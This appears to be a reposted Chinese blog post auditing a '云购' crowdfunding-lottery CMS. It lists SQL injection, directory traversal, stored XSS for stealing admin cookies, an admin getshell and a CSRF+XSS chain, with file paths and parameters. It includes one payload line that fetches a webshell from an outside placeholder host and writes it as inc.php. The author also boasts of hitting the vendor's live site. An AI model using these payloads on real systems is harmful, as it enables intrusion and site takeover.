前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >对某灰色产业cms审计|云购CMS

对某灰色产业cms审计|云购CMS

作者头像
C4rpeDime
发布2022-04-26 15:12:36
2.9K0
发布2022-04-26 15:12:36
举报
文章被收录于专栏:黑白安全

    嘿嘿嘿,这是xDay团队的第一篇反黑灰产业的代码审计文章。这次给大家看的是一个曾经风靡一时的一元云购的一套程序。我就纳闷儿了...这玩意儿现在还在骗人??于是乎就开始着手挖几个洞。

0X01 目录结构

    首先我们先看一下结构,system文件夹下有相关代码。我直接给大家看一下漏洞吧。

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第1张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第1张

0X02 审计出洞

1、购物车异步获取信息 - SQL注入

system\modules\member\cart.action.php

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第2张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第2张

  虽然本身是过滤单引号但是在这里并没有用单引号保护起来所以这里是一个注入,并且没有验证用户身份,从站外未登陆的情况下即可进行注入。

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第3张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第3张

直接官网哈哈哈哈!!!!

2、BOM插件 - 目录遍历

system/plugin/bom/bom.plugin.php 

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第4张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第4张

 直接访问即可,后台即便是改了也没什么事情,照样刚!

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第5张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第5张

3、我的晒单 - 存储型XSS(可打到管理员Cookie)

由于这套CMS出来的较早了,在此之前被许多小黑挖掘过XSS漏洞,但是....我这个XSS貌似也是0day 哈哈哈需要晒单功能这里给大家演示一下先走一遍流程

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第6张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第6张

添加晒图

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第7张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第7张

把图片地址改成我们的XSS语句

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第8张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第8张

fileurl_tmp参数

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第9张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第9张

这时候便把IMG标签闭合了弹出了1 (触发在后台管理的“晒单查看”)

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第10张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第10张

4、上传配置 - 后台GETSHELL

 可能有些人看到后台有上传的地方,其实这些个上传是没有办法利用的。虽然你可以在后台改格式白名单但是依旧提不下。这时候呢....插马呗!!~~

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第11张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第11张

由于他过滤单引号所以这里就不带上单引号了。

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第12张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第12张

允许上传类型处,写上pyload

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第13张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第13张

提交完就完事了~~通过copy函数远程写个马就完事了

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第14张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第14张

5、后台验证码存在缺陷

对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘  第15张
对某灰色产业cms审计|云购CMS 代码审计 安全文摘 安全文摘 第15张

 默认账户admin 这一串MD5值就是对应的验证码的值,此处可以调用接口进行爆破。也是个小小的缺陷吧

6、组合拳GetShell - CSRF+XSS

  我们直接用XSS嵌套一个html页面,然后模拟所有的操作就完事了从修改upload格式插马开始到模拟访问

[/index.php/admin/setting/upload?c=copy("http://www.xxx.com/shell.txt","../inc.php");

直接一些列打过去就完事儿了实在不放心就在最后模拟添加一个管理员就阔以了。

  这套CMS并没有过滤CSRF攻击,我也不截图了各位表哥的姿势比我骚,哇嘎嘎嘎嘎嘎嘎....需要源码可以跟我说一下(好累喔) 

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-02-15),如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0X01 目录结构
  • 0X02 审计出洞
相关产品与服务
验证码
腾讯云新一代行为验证码(Captcha),基于十道安全栅栏, 为网页、App、小程序开发者打造立体、全面的人机验证。最大程度保护注册登录、活动秒杀、点赞发帖、数据保护等各大场景下业务安全的同时,提供更精细化的用户体验。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档